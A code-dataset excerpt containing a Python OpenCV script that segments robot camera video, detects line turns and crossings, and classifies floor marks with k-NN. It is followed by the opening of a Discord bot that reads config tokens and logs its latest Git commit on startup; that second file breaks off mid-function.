index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
991,200 | 21c8befa7df3f766cdb54409180ad396334b84a8 | #!/usr/bin/python
import argparse
import numpy as np
import re
import sys
import time # noqa, disable flycheck warning
from matplotlib import pyplot as plt # noqa, disable flycheck warning
from os import listdir, mkdir
from os.path import isfile, join
from scipy.misc import imread, imsave
from sklearn.neighbors.nearest_centroid import NearestCentroid
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cross_validation import LeaveOneOut # noqa, disable flycheck warning
from sklearn.decomposition import PCA # noqa, disable flycheck warning
import cv2
import select_pixels as sel
VIDEO = 'video2017-3.avi'
TRAIN_IMG = '576'
TRAIN_DIR = 'TrainFrames'
SEGM_DIR = 'SegmFrames'
NORM_DIR = 'NormFrames'
ANALY_DIR = 'AnalyFrames'
CHULL_DIR = 'ChullFrames'
VID_DIR = 'OutputVideos'
MARK_DIR = 'TrainMark'
MARKS = ['Cruz', 'Escalera', 'Persona', 'Telefono']
COLORS = ['red', 'blue', 'green', 'black']
FONT = cv2.FONT_HERSHEY_SIMPLEX
neigh_clf = None
pca = None
col = None
marks = None
plx = None
ply = None
class TypeObjAutomaton:
# recta==giro_izq==giro_dcha, cruce_2_vias==cruce_3_vias
# States are -, 0 , +
# On success increase state
# On failure decrease state
def __init__(self):
self.state = 0
def _state(self):
return self.state
def _reset(self):
if self.state:
self.state = 0
# Return 0==marca if recta/giro, 1==flecha if cruce
def __decrease(self):
self.state -= 1
return 0 if (self.state < 0) else 1
def __increase(self):
self.state += 1
return 0 if (self.state < 0) else 1
def getType(self, state):
if state:
return self.__decrease()
else:
return self.__increase()
class MarkAutomaton:
# States are 0, 1, 2, 3
# Get the maximum state
def __init__(self):
self.state = [0, 0, 0, 0]
def _state(self):
return self.state
def _reset(self):
if not all(self.state):
self.state = [0, 0, 0, 0]
def getType(self, pred):
self.state[pred] += 1
return MARKS[np.argmax(self.state)]
def marking():
capture = cv2.VideoCapture(VIDEO)
count = 0
make_dir(TRAIN_DIR)
pause = False
while(capture.isOpened()):
if not pause:
ret, frame = capture.read()
if ret and not count % 24:
cv2.imshow('Image', frame)
# compare key pressed with the ascii code of the character
key = cv2.waitKey(1000)
# key = 1010 0000 0000 1011 0110 1110
# &
# 0xFF = 1111 1111
# n==110 = 0110 1110
# (n)ext image
if (key & 0xFF) == ord('n'):
count += 1
continue
# mark image, (s)top
if (key & 0xFF) == ord('s'):
# change from BGR to RGB format
im_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# mark training pixels
mark_img = sel.select_fg_bg(im_rgb)
imsave(join(TRAIN_DIR, 'OriginalImg'+str(count)+'.png'), im_rgb)
imsave(join(TRAIN_DIR, 'TrainingImg'+str(count)+'.png'), mark_img)
# (q)uit program
if (key & 0xFF) == ord('q'):
break
# (p)ause program
if (key & 0xFF) == ord('p'):
pause = not pause
elif not ret:
print "End of video"
break
count += 1
capture.release()
cv2.destroyAllWindows()
# mark and train_img_m params in case of training knn classifier (marks)
# train with a different training image
def training(mark=False, train_img_m=''):
make_dir(NORM_DIR)
# Height x Width x channel
if mark:
orig_img = imread(join(TRAIN_DIR, 'OriginalImg'+train_img_m+'.png'))
mark_img = imread(join(TRAIN_DIR, 'TrainingImg'+train_img_m+'.png'))
else:
orig_img = imread(join(TRAIN_DIR, 'OriginalImg'+TRAIN_IMG+'.png'))
mark_img = imread(join(TRAIN_DIR, 'TrainingImg'+TRAIN_IMG+'.png'))
# Normalization: all = R+G+B, R = R/all, G = G/all, B = B/all
# [[[1, 2, 3], [[[1, 4], [[[1/6 , 4/15], [[[1/6 , 2/6 , 3/6 ],
# [4, 5, 6]], [6, 8], [6/15, 8/21], [4/15, 5/15, 6/15]],
# [5, 8]], [5/18, 8/17]],
#
#
# [[6, 5, 4], rollaxis(x,2) [[2, 5], np.sum(x,2) [[ 6,15], R/S [[2/6 , 5/15], rollaxis(D,0,3) [[6/15, 5/15, 4/15],
# [8, 7, 6]], ------------> [5, 7], ----------> [15,21], ------> [5/15, 7/21], --------------> [8/21, 7/21, 6/21]],
# R [6, 9]], S [18,17]] D [6/18, 9/17]],
#
# [[5, 6, 7], [[3, 6], [[3/6 , 6/15], [[5/18, 6/18, 7/18],
# [8, 9, 0]]] [4, 6], [4/15, 6/21], [8/17, 9/17, 0/17]]]
# [7, 0]]] [7/18, 0/17]]]
img_norm = np.rollaxis((np.rollaxis(orig_img, 2)+0.1)/(np.sum(orig_img, 2)+0.1), 0, 3)
# Get marked points from original image
# np.equal(markImg, (255, 0, 0) --> X*Y*3
# Matrix of X rows, each row have Y rows with 3 columns of booleans
# np.all(np.equal..., 2) --> X*Y
# Matrix of X rows with Y columns, True if pixel has red mark
# np.where(np.all...) --> X*Y
# Matrix of indices with red marked pixels
data_red = img_norm[np.where(np.all(np.equal(mark_img, (255, 0, 0)), 2))]
data_green = img_norm[np.where(np.all(np.equal(mark_img, (0, 255, 0)), 2))]
data_blue = img_norm[np.where(np.all(np.equal(mark_img, (0, 0, 255)), 2))]
data = np.concatenate([data_red, data_green, data_blue])
target = np.concatenate([np.zeros(len(data_red[:]), dtype=int),
np.ones(len(data_green[:]), dtype=int),
np.full(len(data_blue[:]), 2, dtype=int)])
clf = NearestCentroid()
clf.fit(data, target)
return clf
# mark param to segmentate all the image, not just the 90: pixels
# segm param to show a frame with the segmentated image
def segmentation(clf, frame, count, args, segm, mark=False):
if not mark:
shape = frame[90:, :].shape
frame_rgb = cv2.cvtColor(frame[90:, :], cv2.COLOR_BGR2RGB)
else:
shape = frame.shape # Segm all
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # Segm all
shape = frame.shape # Segm all
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # Segm all
img_norm = np.rollaxis((np.rollaxis(frame_rgb, 2)+0.1)/(np.sum(frame_rgb, 2)+0.1), 0, 3)
if args.genVideo and args.genVideo == 'norm':
imsave(join(NORM_DIR, 'Norm'+str(count)+'.png'), img_norm*255)
# Reshape in order to reduce the 3-dimensional array to 1-dimensional (needed for predict)
reshape = img_norm.reshape(shape[0]*shape[1], 3)
labels = clf.predict(reshape)
# Reshape back, from 1-dimensional to 2-dimensional
reshape_back = labels.reshape(shape[0], shape[1])
paleta = np.array([[255, 0, 0], [0, 0, 0], [0, 0, 255]], dtype=np.uint8)
# Automatic reshape is being done here, from 2-dimensional to 3-dimensional array [[1, 1, ...]] -> [[[0,0,0], ....]]
aux = paleta[reshape_back]
segm_img = cv2.cvtColor(aux, cv2.COLOR_RGB2BGR)
if segm:
cv2.imshow('Segm', segm_img)
if args.genVideo:
if args.genVideo == 'segm':
cv2.imwrite(join(SEGM_DIR, 'SegmImg'+str(count)+'.png'), segm_img)
# Image with the line in white
line_img = (reshape_back == 2).astype(np.uint8)*255
# Image with the arrow/mark in white
arrow_mark_img = (reshape_back == 0).astype(np.uint8)*255
return line_img, arrow_mark_img
def analysis(clf, args, segm=False):
if VIDEO == '0':
capture = cv2.VideoCapture(0)
else:
capture = cv2.VideoCapture(VIDEO)
count = 0
latest_org = 0
if args.genVideo:
if args.genVideo == 'segm':
make_dir(SEGM_DIR)
elif args.genVideo == 'norm':
make_dir(NORM_DIR)
elif args.genVideo == 'analy':
make_dir(ANALY_DIR)
elif args.genVideo == 'chull':
make_dir(CHULL_DIR)
pause = False
type_aut = TypeObjAutomaton()
mark_aut = MarkAutomaton()
while(capture.isOpened()):
if not pause:
ret, frame = capture.read()
# if ret and not count % 24:
if ret:
# if video == '0':
# ret = capture.set(3, 340)
# ret = capture.set(240)
cv2.imshow('Original', frame)
line_img, arrow_mark_img = segmentation(clf, frame, count, args, segm)
# FindContours is destructive, so we copy make a copy
line_img_cp = line_img.copy()
# FindContours is destructive, so we copy make a copy
arrow_mark_img_cp = arrow_mark_img.copy()
# Should we use cv2.CHAIN_APPROX_NONE? or cv2.CHAIN_APPROX_SIMPLE? the former stores all points, the latter stores the basic ones
# Find contours of line
cnts_l, hier = cv2.findContours(line_img, cv2.RETR_LIST,
cv2.CHAIN_APPROX_NONE)
# Find contours of arror/mark
cnts_am, hier = cv2.findContours(arrow_mark_img, cv2.RETR_LIST,
cv2.CHAIN_APPROX_NONE)
# Removes small contours, i.e: small squares
newcnts_l = [cnt for cnt in cnts_l if len(cnt) > 100]
newcnts_am = [cnt for cnt in cnts_am if len(cnt) > 75]
# DrawContours is destructive
# analy = frame.copy()[90:]
analy = frame.copy()
# Return list of indices of points in contour
chull_list_l = [cv2.convexHull(cont, returnPoints=False) for cont in newcnts_l]
chull_list_am = [cv2.convexHull(cont, returnPoints=False) for cont in newcnts_am]
# print "chull_list_l: ", len(chull_list_l)
# for idx, ccc in enumerate(chull_list_l):
# print "idx: ", idx, "ccc: ", ccc
# print "size_ccc: ", len(ccc)
# Return convexity defects from previous contours, each contour must have at least 3 points
# Convexity Defect -> [start_point, end_point, farthest_point, distance_to_farthest_point]
conv_defs_l = [(cv2.convexityDefects(cont, chull), pos) for pos, (cont, chull) in
enumerate(zip(newcnts_l, chull_list_l)) if len(cont) > 3 and len(chull) > 3]
conv_defs_am = [(cv2.convexityDefects(cont, chull), pos) for pos, (cont, chull) in
enumerate(zip(newcnts_am, chull_list_am)) if len(cont) > 3 and len(chull) > 3]
list_conv_defs_l = []
list_cont_l = []
list_conv_defs_am = []
list_cont_am = []
# Only save the convexity defects whose hole is larger than ~4 pixels (1000/256).
for el in conv_defs_l:
if el is not None:
aux = el[0][:, :, 3] > 1000
if any(aux):
list_conv_defs_l.append(el[0][aux]) # el = (convDefs, position)
list_cont_l.append(newcnts_l[el[1]])
for el in conv_defs_am:
if el is not None:
aux = el[0][:, :, 3] > 1000
if any(aux):
list_conv_defs_am.append(el[0][aux])
list_cont_am.append(newcnts_am[el[1]])
mark = True
if not list_conv_defs_l:
cv2.putText(analy, "Linea recta", (0, 140),
FONT, 0.5, (0, 0, 0), 1)
for pos, el in enumerate(list_conv_defs_l):
for i in range(el.shape[0]):
if el.shape[0] == 1:
# [NormX, NormY, PointX, PointY]
[vx, vy, x, y] = cv2.fitLine(list_cont_l[pos], cv2.cv.CV_DIST_L2, 0, 0.01, 0.01)
slope = vy/vx
if slope > 0:
cv2.putText(analy, "Giro izq", (0, 140),
FONT, 0.5, (0, 0, 0), 1)
else:
cv2.putText(analy, "Giro dcha", (0, 140),
FONT, 0.5, (0, 0, 0), 1)
elif el.shape[0] == 2 or el.shape[0] == 3:
cv2.putText(analy, "Cruce 2 salidas", (0, 140),
FONT, 0.5, (0, 0, 0), 1)
mark = False
elif el.shape[0] == 4:
cv2.putText(analy, "Cruce 3 salidas", (0, 140),
FONT, 0.5, (0, 0, 0), 1)
mark = False
if args.genVideo and args.genVideo == 'chull':
# Draw convex hull and hole
s, e, f, d = el[i]
start = tuple(list_cont_l[pos][s][0])
end = tuple(list_cont_l[pos][e][0])
far = tuple(list_cont_l[pos][f][0])
cv2.line(analy, start, end, [0, 255, 0], 2)
cv2.circle(analy, far, 3, [0, 0, 255], -1)
if args.genVideo and args.genVideo == 'chull':
for pos, el in enumerate(list_conv_defs_am):
for i in range(el.shape[0]):
# Draw convex hull and hole
s, e, f, d = el[i]
start = tuple(list_cont_am[pos][s][0])
end = tuple(list_cont_am[pos][e][0])
far = tuple(list_cont_am[pos][f][0])
cv2.line(analy, start, end, [0, 255, 0], 2)
cv2.circle(analy, far, 3, [0, 0, 255], -1)
if not newcnts_am:
type_aut._reset()
mark_aut._reset()
else:
if not type_aut.getType(mark):
if len(newcnts_am) == 1:
hu_mom = cv2.HuMoments(cv2.moments(newcnts_am[0])).flatten()
# hu_mom2 = -np.sign(hu_mom)*np.log10(np.abs(hu_mom))
pred = neigh_clf.predict([hu_mom])
if pred == 0:
cv2.putText(analy, "Cruz", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
elif pred == 1:
cv2.putText(analy, "Escalera", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
elif pred == 2:
cv2.putText(analy, "Persona", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
elif pred == 3:
cv2.putText(analy, "Telefono", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
# pr_pca = pca.transform(hu_mom.reshape(1, -1))
# for pos, p in enumerate(plx):
# plt.scatter(p, ply[pos], label=MARKS[pos], color=COLORS[pos])
# plt.scatter(pr_pca[0, 0], pr_pca[0, 1], label="ToPredict", color="cyan")
# plt.legend()
# plt.show()
# cv2.putText(analy, mark_aut.getType(pred[0]), (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
else:
cv2.putText(analy, "Flecha", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
for c in newcnts_am:
ellipse = cv2.fitEllipse(c)
center, axis, angle = ellipse
# Axis angles, major, minor
maj_ang = np.deg2rad(angle)
min_ang = maj_ang + np.pi/2
# Axis lenghts
major_axis = axis[1]
minor_axis = axis[0]
# Lines of axis, first line and his complementary
lineX1 = int(center[0]) + int(np.sin(maj_ang)*(major_axis/2))
lineY1 = int(center[1]) - int(np.cos(maj_ang)*(major_axis/2))
lineX2 = int(center[0]) - int(np.sin(maj_ang)*(major_axis/2))
lineY2 = int(center[1]) + int(np.cos(maj_ang)*(major_axis/2))
if args.genVideo and args.genVideo == 'chull':
linex1 = int(center[0]) + int(np.sin(min_ang)*(minor_axis/2))
liney1 = int(center[1]) - int(np.cos(min_ang)*(minor_axis/2))
cv2.line(analy, (int(center[0]), int(center[1])), (lineX1, lineY1), (0, 0, 255), 2)
cv2.line(analy, (int(center[0]), int(center[1])), (linex1, liney1), (255, 0, 0), 2)
cv2.circle(analy, (int(center[0]), int(center[1])), 3, (0, 0, 0), -1)
cv2.ellipse(analy, ellipse, (0, 255, 0), 2)
cv2.putText(analy, "Ang. elipse: "+str(angle), (0, 110),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
# Get coordinates of arrow pixels
# arrow = cv2.findNonZero(arrow_mark_img_cp)[:, 0, :]
idx = np.where(arrow_mark_img_cp != 0)
size_idx = len(idx[0])
arrow = np.array([[idx[1][idy], idx[0][idy]] for idy in range(size_idx)])
angle360 = angle # Initial angle in [0,180)
if 45 <= angle <= 135: # Arrow kind of horizontal -> cut in vertical
# Divide arrow in two lists depending on X coordinate of the center
left = [1 for px in arrow if px[0] < center[0]]
right = [1 for px in arrow if px[0] > center[0]]
if len(right) >= len(left):
peak = (lineX1, lineY1) # Arrow peak is the point in major axis 1
else:
peak = (lineX2, lineY2) # Arrow peak is the point in major axis 2
angle360 += 180 # Real angle in [0,360)
else: # Arrow kind of vertical -> cut in horizontal
# Divide arrow in two lists depending on Y coordinate of the center
up = [1 for px in arrow if px[1] < center[1]]
down = [1 for px in arrow if px[1] > center[1]]
if (len(up) >= len(down) and angle < 45) or (len(down) >= len(up) and angle > 135):
peak = (lineX1, lineY1) # Arrow peak is the point in major axis 1
else:
peak = (lineX2, lineY2) # Arrow peak is the point in major axis 2
angle360 += 180
angle360 = int(angle360)
hasLine = 1
if angle360 >= 337.5 or angle360 < 22.5:
cv2.putText(analy, "Norte (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = 0
elif angle360 < 67.5:
cv2.putText(analy, "Noreste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = -0.25
elif angle360 < 112.5:
cv2.putText(analy, "Este (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = -0.5
elif angle360 < 157.5:
cv2.putText(analy, "Sureste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = -0.8
elif angle360 < 202.5:
cv2.putText(analy, "Sur (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = 1
elif angle360 < 247.5:
cv2.putText(analy, "Suroeste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = 0.8
elif angle360 < 292.5:
cv2.putText(analy, "Oeste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = 0.5
elif angle360 < 337.5:
cv2.putText(analy, "Noroeste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
lineDistance = 0.25
cv2.line(analy, (int(peak[0]), int(peak[1])), (int(center[0]), int(center[1])), (0, 0, 255), 2)
cv2.circle(analy, (int(peak[0]), int(peak[1])), 3, (0, 255, 0), -1)
left_border = line_img_cp[:, :20].copy()
right_border = line_img_cp[:, 300:].copy()
top_border = line_img_cp[:20, 20:300].copy()
bot_border = line_img_cp[220:, 20:300].copy()
all_mlc = []
all_mrc = []
all_mtc = []
all_mbc = []
left_cnt, hier = cv2.findContours(left_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
left_cnt = [cnt for cnt in left_cnt if cv2.contourArea(cnt) > 50]
if left_cnt:
for l in left_cnt:
mlc = np.mean(l[:, :, :], axis=0, dtype=np.int32)
all_mlc.append(mlc)
cv2.circle(analy, (mlc[0, 0], mlc[0, 1]), 3, (0, 255, 0), -1)
right_cnt, hier = cv2.findContours(right_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
right_cnt = [cnt for cnt in right_cnt if cv2.contourArea(cnt) > 50]
if right_cnt:
for r in right_cnt:
r[:, :, 0] = r[:, :, 0] + 300
mrc = np.mean(r[:, :, :], axis=0, dtype=np.int32)
all_mrc.append(mrc)
cv2.circle(analy, (mrc[0, 0], mrc[0, 1]), 3, (0, 255, 0), -1)
top_cnt, hier = cv2.findContours(top_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
top_cnt = [cnt for cnt in top_cnt if cv2.contourArea(cnt) > 50]
if top_cnt:
for t in top_cnt:
t[:, :, 0] = t[:, :, 0] + 20
mtc = np.mean(t[:, :, :], axis=0, dtype=np.int32)
all_mtc.append(mtc)
cv2.circle(analy, (mtc[0, 0], mtc[0, 1]), 3, (0, 255, 0), -1)
bot_cnt, hier = cv2.findContours(bot_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
bot_cnt = [cnt for cnt in bot_cnt if cv2.contourArea(cnt) > 50]
if bot_cnt:
for b in bot_cnt:
b[:, :, 0] = b[:, :, 0] + 20
b[:, :, 1] = b[:, :, 1] + 220
mbc = np.mean(b[:, :, :], axis=0, dtype=np.int32)
all_mbc.append(mbc)
cv2.circle(analy, (mbc[0, 0], mbc[0, 1]), 3, (255, 0, 255), -1)
# # n_puntos = len(all_mtc) + len(all_mlc) + len(all_mrc) + len(all_mbc)
# # mark = True
# # if n_puntos == 2:
# # if len(all_mlc):
# # print "Curva a izquierda"
# # elif len(all_mrc):
# # print "Curva a derecha"
# # else:
# # print "Recta"
# # elif n_puntos == 3:
# # print "Cruce 2 salidas"
# # mark = False
# # elif n_puntos == 4:
# # print "Cruce 3 salidas"
# # mark = False
# # else:
# # print "No tengo ni idea de que es, n_puntos: ", n_puntos, \
# # " top: ", len(all_mtc), " left: ", len(all_mlc), " right: ", len(all_mrc), " bot: ", len(all_mbc)
# if all_mbc:
# org = all_mbc[np.argmin([abs(160 - mbc[0, 0]) for mbc in all_mbc])] # compare bottom points with the center of the image - horizontally
# latest_org = org
# else:
# org = latest_org
# if not mark:
# if all_mtc and (lineDistance == 0 or lineDistance == -0.25 or lineDistance == 0.25): # norte
# dst = all_mtc[np.argmin([mtc[0, 1] for mtc in all_mtc])]
# elif all_mrc and (lineDistance == -0.5 or lineDistance == -0.8): # este
# dst = all_mrc[np.argmin([mrc[0, 1] for mrc in all_mrc])]
# elif all_mlc and (lineDistance == 0.5 or lineDistance == 0.8): # oeste
# dst = all_mlc[np.argmin([mlc[0, 1] for mlc in all_mlc])]
# else:
# dst = np.array([[160, 120]])
# else:
# # print "Entro?"
# # print "all_mtc: ", all_mtc
# # print "all_mlc: ", all_mlc
# # print "all_mrc: ", all_mrc
# # print "all_mbc: ", all_mbc
# if len(all_mtc) != 0:
# # print "primero"
# dst = all_mtc[0]
# elif len(all_mlc) != 0:
# # print "segundo"
# dst = all_mlc[0]
# elif len(all_mrc) != 0:
# # print "tercero"
# dst = all_mrc[0]
# elif len(all_mbc) > 1:
# # print "cuarto"
# dst = all_mbc[np.argmax([abs(160 - mbc[0, 0]) for mbc in all_mbc])]
# # print "Entro! dst: ", dst
# org_dst = np.array([org[0], dst[0]]) # tam 2 (1 es punto origen, 2 punto salida)
# # print "org_dst: ", org_dst
# cv2.circle(analy, (org_dst[0, 0], org_dst[0, 1]), 3, (229, 9, 127), -1)
# cv2.circle(analy, (org_dst[1, 0], org_dst[1, 1]), 3, (229, 9, 127), -1)
if args.genVideo and args.genVideo == 'chull':
cv2.drawContours(analy, left_cnt, -1, (255, 0, 0), 2)
cv2.drawContours(analy, right_cnt, -1, (0, 255, 0), 2)
cv2.drawContours(analy, top_cnt, -1, (255, 0, 255), 2)
cv2.drawContours(analy, bot_cnt, -1, (0, 0, 255), 2)
cv2.drawContours(analy, newcnts_l, -1, (255, 0, 0), 1)
cv2.drawContours(analy, newcnts_am, -1, (0, 0, 255), 1)
cv2.imshow("Contours", analy)
# if args.genVideo:
# if args.genVideo == 'analy':
# cv2.imwrite(join(ANALY_DIR, 'AnalyImg'+str(count)+'.png'), analy)
# elif args.genVideo == 'chull':
# cv2.imwrite(join(CHULL_DIR, 'ChullImg'+str(count)+'.png'), analy)
# compare key pressed with the ascii code of the character
key = cv2.waitKey(10)
# (n)ext image
if (key & 0xFF) == ord('n'):
count += 1
continue
# (q)uit program
if (key & 0xFF) == ord('q'):
break
# (p)ause program
if (key & 0xFF) == ord('p'):
pause = not pause
elif not ret:
print "End of video"
break
count += 1
capture.release()
cv2.destroyAllWindows()
# def mark_train(args):
# global plx, ply, pca, neigh_clf
# clf = training(mark=True, train_img_m='9999')
# all_hu = []
# labels = []
# for idx, m in enumerate(MARKS):
# files = [join(MARK_DIR, m, 'chosen', f)
# for f in listdir(join(MARK_DIR, m, 'chosen'))]
# h = []
# l = []
# for i in files:
# frame = imread(i)
# frame_bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
# _, arrow_mark_img = segmentation(clf, frame_bgr, 0, args, segm=False, mark=True)
# cnts, hier = cv2.findContours(arrow_mark_img, cv2.RETR_LIST,
# cv2.CHAIN_APPROX_NONE)
# cnts = [cnt for cnt in cnts if cv2.contourArea(cnt) > 75]
# hu_mom = cv2.HuMoments(cv2.moments(cnts[0])).flatten()
# h.append(hu_mom)
# l.append(idx)
# all_hu.append(h)
# labels.append(l)
# all_hu = np.array(all_hu)
# # with open('dataset.rob', 'wb') as f:
# # np.savetxt(f, all_hu.reshape(400, 7))
# labels = np.array(labels)
# q_n = 1
# cov_list = np.cov(all_hu.reshape(400, 7).T)
# neigh = KNeighborsClassifier(n_neighbors=q_n, weights='distance',
# metric='mahalanobis', metric_params={'V': cov_list})
# loo = LeaveOneOut(100)
# s = 4*99
# fallo_cruz = 0
# fallo_escalera = 0
# fallo_persona = 0
# fallo_telefono = 0
# for train_idx, test_idx in loo:
# neigh.fit(all_hu[:, train_idx].reshape((s, 7)), labels[:, train_idx].reshape((s,)))
# res = neigh.predict(all_hu[:, test_idx].reshape(4, 7))
# if res[0] != 0:
# fallo_cruz += 1
# if res[1] != 1:
# fallo_escalera += 1
# if res[2] != 2:
# fallo_persona += 1
# if res[3] != 3:
# fallo_telefono += 1
# print "q-NN: ", q_n
# print "Acierto Cruz (%): ", 100-fallo_cruz
# print "Acierto Escalera (%): ", 100-fallo_escalera
# print "Acierto Persona (%): ", 100-fallo_persona
# print "Acierto Telefono (%): ", 100-fallo_telefono
# # s = 4*100
# # fallo_cruz = 0
# # fallo_escalera = 0
# # fallo_persona = 0
# # fallo_telefono = 0
# # pca = PCA(n_components=2)
# # tr_data = pca.fit_transform(all_hu.reshape((s, 7)))
# # tr_label = labels.reshape((s,))
# # plx = [[], [], [], []]
# # ply = [[], [], [], []]
# # for idx, el in enumerate(tr_data):
# # ps = tr_label[idx]
# # plx[ps].append(el[0])
# # ply[ps].append(el[1])
# # for pos, p in enumerate(plx):
# # plt.scatter(p, ply[pos], label=MARKS[pos], color=COLORS[pos])
# # plt.legend()
# # plt.show()
# # sys.exit()
# # neigh.fit(all_hu.reshape((s, 7)), labels.reshape((s,)))
# # for idx in range(100):
# # res = neigh.predict(all_hu[:, idx].reshape(4, 7))
# # if res[0] != 0:
# # fallo_cruz += 1
# # if res[1] != 1:
# # fallo_escalera += 1
# # if res[2] != 2:
# # fallo_persona += 1
# # if res[3] != 3:
# # fallo_telefono += 1
# # print "K-neighbors: ", k_n
# # print "% Acierto Cruz: ", 100-fallo_cruz
# # print "% Acierto Escalera: ", 100-fallo_escalera
# # print "% Acierto Persona: ", 100-fallo_persona
# # print "% Acierto Telefono: ", 100-fallo_telefono
# neigh_clf = neigh
def mark_train(args):
all_hu = np.load('moments.hu')
labels = np.load('moments.labels')
q_n = 1
cov_list = np.cov(all_hu.reshape(400, 7).T)
neigh = KNeighborsClassifier(n_neighbors=q_n, weights='distance',
metric='mahalanobis', metric_params={'V': cov_list})
n_images = 4*100
neigh.fit(all_hu.reshape((n_images, 7)), labels.reshape((n_images,)))
global neigh_clf
neigh_clf = neigh
return neigh
def gen_video(name, procedure):
make_dir(VID_DIR)
aux_dir = None
if procedure == 'segm':
aux_dir = SEGM_DIR
elif procedure == 'norm':
aux_dir = NORM_DIR
elif procedure == 'analy':
aux_dir = ANALY_DIR
elif procedure == 'chull':
aux_dir = CHULL_DIR
images = [f for f in listdir(aux_dir) if isfile(join(aux_dir, f))]
if not len(images):
print "No images to create the video."
sys.exit()
images = natural_sort(images)
aux = cv2.imread(join(aux_dir, images[0]))
height, width, layers = aux.shape
video = cv2.VideoWriter(join(VID_DIR, name+'.avi'), cv2.cv.CV_FOURCC('M', 'P', '4', '2'), 1.0, (width, height))
for img in images:
video.write(cv2.imread(join(aux_dir, img)))
cv2.destroyAllWindows()
video.release()
def natural_sort(images_list):
def convert(text):
return int(text) if text.isdigit() else text.lower()
def alphanum_key(key):
return [convert(c) for c in re.split('([0-9]+)', key)]
return sorted(images_list, key=alphanum_key)
def make_dir(dirName):
try:
mkdir(dirName)
except OSError:
pass
def main(parser, args):
global VIDEO, TRAIN_IMG
if args.video:
VIDEO = args.video
if args.trainImg:
TRAIN_IMG = args.trainImg
# Mark lots of images
if args.mark:
marking()
elif args.segm:
print "Training q-NN classifier..."
mark_train(args)
print "Starting video analysis..."
clf = training()
analysis(clf, args, segm=True)
elif args.analy:
print "Training q-NN classifier..."
mark_train(args)
print "Starting video analysis..."
clf = training()
analysis(clf, args)
if args.genVideo:
gen_video(args.output, args.genVideo)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='robotica.py')
parser.add_argument('-v', '--video',
help='Select a different video.')
parser.add_argument('-t', '--trainImg',
help='Select a different trainingImg.')
parser.add_argument('-o', '--output',
default='video_output',
help='Choose the output video name.')
group = parser.add_argument_group('Commands')
group.add_argument('-m', '--mark',
action='store_true',
help='Start marking process.')
group.add_argument('-s', '--segm',
action='store_true',
help='Start segmentation process.')
group.add_argument('-a', '--analy',
action='store_true', default='True',
help='Start analysis process.')
group.add_argument('-g', '--genVideo',
choices=['segm', 'norm', 'analy', 'chull'],
nargs='?', const='analy',
help='Generate choosen procedure video.')
args = parser.parse_args()
main(parser, args)
|
991,201 | 04a25df867c84ddb273fc692faafa5c834a83c5c | # Main Workflow
import discord
from discord import message
from discord import file
from discord.ext import commands
import os
from dotenv import load_dotenv
from datetime import datetime
from github import Github
import git
import pytz
# Custom classes
from helpers.emojis import Emojis
# Load/run nessesary components/functions
load_dotenv()
# Getting latest GitHub commit
g = Github(os.getenv("GITHUB_TOKEN"))
repo = g.get_repo("Mordai/PPKE-ITK-MI-2021-DCBot")
commits = repo.get_commits()
github_last_commit = commits[0]
github_messages = github_last_commit.commit.message.split('\n\n')
github_desc = "".join(github_messages[1:]) if len(github_messages[1:]) > 0 else "No desc given"
# Getting latest local git commit
try:
local_repo = git.Repo(search_parent_directories=True)
headcommit = local_repo.head.commit
sha = local_repo.head.object.hexsha
local_commiter = headcommit.committer.name
except:
sha = ""
local_commiter = ""
# General variables
tz = pytz.timezone('Europe/Budapest')
now = datetime.now(tz)
MAIN_SERVER_GUILD = os.getenv("ITK_SERVER_ID")
TOKEN = os.getenv("DC_TOKEN")
intents = discord.Intents.all()
intents.members = True
########## BOT content ##########
bot = commands.Bot(intents = intents)
# Default/main events
@bot.event
async def on_ready():
print("Ready to go!")
bot.CH_bot_log = bot.get_channel(891715602442510386)
message_log_start = f"{Emojis.StatusEmojis.sparkle} `Bot started: " + now.strftime("%Y-%m-%d %H:%M:%S") + "`"
try:
message_local = "\n```Current HEAD → " + sha + \
"\nCurrent author → " + local_commiter + "```"
except:
message_local = ""
try:
message_heroku = "\n```Current HEAD → " + os.getenv("HEROKU_SLUG_COMMIT") + \
"\nCurrent author → HEROKU (deployment)" + \
"\nCommit name: " + github_messages[0] + \
"\nCommit desc: " + github_desc + "```"
except:
message_heroku = ""
